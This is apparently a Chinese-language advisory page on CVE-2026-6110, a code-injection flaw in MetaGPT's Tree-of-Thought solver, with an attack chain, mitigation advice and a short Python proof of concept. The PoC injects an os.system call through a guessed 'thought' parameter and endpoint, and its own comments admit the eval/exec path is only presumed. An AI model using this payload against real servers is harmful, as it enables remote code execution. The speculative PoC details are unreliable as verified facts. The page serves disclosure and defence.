CVE-2026-6110 CVSS 7.3 高危

CVE-2026-6110 MetaGPT 代码注入漏洞

披露日期: 2026-04-12

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-6110

漏洞类型

代码注入

CVSS评分

7.3 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

FoundationAgents MetaGPT

漏洞概述

FoundationAgents MetaGPT 0.8.1及之前版本存在代码注入漏洞。该漏洞位于Tree-of-Thought Solver组件的`metagpt/strategy/tot.py`文件中的`generate_thoughts`函数。攻击者无需认证即可远程利用该漏洞，通过操纵输入注入恶意代码，导致系统机密性、完整性和可用性受损。目前利用代码已公开，厂商尚未修复。

技术细节

该漏洞的核心在于`metagpt/strategy/tot.py`中的`generate_thoughts`函数未能正确处理用户提供的输入。在Tree-of-Thought（ToT）求解器的实现逻辑中，可能直接将用户输入拼接到Python代码中并使用`exec()`或`eval()`等危险函数执行。攻击者可以通过构造包含Python语句的Payload，绕过简单的字符过滤，使得服务器端执行任意系统命令或代码。CVSS v3.1评分7.3，反映了其无需用户交互（UI:N）和无需权限（PR:N）的特性，攻击门槛较低。尽管影响评级为低，但在特定配置下可能导致敏感信息泄露或服务器被控制。

攻击链分析

STEP 1

侦察

攻击者识别出目标系统运行的是FoundationAgents MetaGPT 0.8.1或更早版本。

STEP 2

武器化

攻击者构造包含恶意Python代码的Payload，旨在通过`generate_thoughts`函数执行系统命令。

STEP 3

传递

攻击者向MetaGPT的Tree-of-Thought Solver接口发送包含恶意Payload的HTTP请求。

STEP 4

利用

服务器端接收请求，`tot.py`中的`generate_thoughts`函数处理输入，由于缺乏过滤，恶意代码被执行。

STEP 5

影响

攻击者在服务器上获得低权限代码执行能力，可能导致数据泄露或服务中断。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# PoC for CVE-2026-6110: MetaGPT Code Injection
import requests

def exploit(target_url):
    # The vulnerable parameter 'thought' is passed to generate_thoughts
    # which likely uses eval/exec internally.
    payload = "__import__('os').system('whoami')"
    
    headers = {'Content-Type': 'application/json'}
    data = {'thought': payload}
    
    try:
        response = requests.post(target_url, json=data, headers=headers)
        if response.status_code == 200:
            print("[+] Request sent successfully. Check if command executed.")
            print(f"Response: {response.text}")
        else:
            print(f"[-] Request failed with status code: {response.status_code}")
    except Exception as e:
        print(f"[!] Error: {e}")

if __name__ == "__main__":
    # Replace with actual target endpoint
    target = "http://localhost:8080/api/solver/tot"
    exploit(target)

影响范围

FoundationAgents MetaGPT <= 0.8.1

防御指南

临时缓解措施

建议立即限制MetaGPT服务的网络访问，仅允许可信IP调用。如果无法立即升级，应暂时禁用Tree-of-Thought Solver功能或修改源代码，对传入`generate_thoughts`函数的所有参数进行严格的输入验证和过滤，禁止包含特殊字符或Python关键字的输入。同时，应密切监控系统日志，检测是否存在异常的代码执行行为。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-6110
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-6110
3 Details https://www.cvedetails.com/cve/CVE-2026-6110/
4 VulDB https://vuldb.com/cve/CVE-2026-6110
5 Link https://github.com/FoundationAgents/MetaGPT/
6 Link https://github.com/FoundationAgents/MetaGPT/issues/1933
7 Link https://github.com/FoundationAgents/MetaGPT/pull/1946
8 Link https://vuldb.com/submit/791761
9 Link https://vuldb.com/vuln/356970
10 Link https://vuldb.com/vuln/356970/cti

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表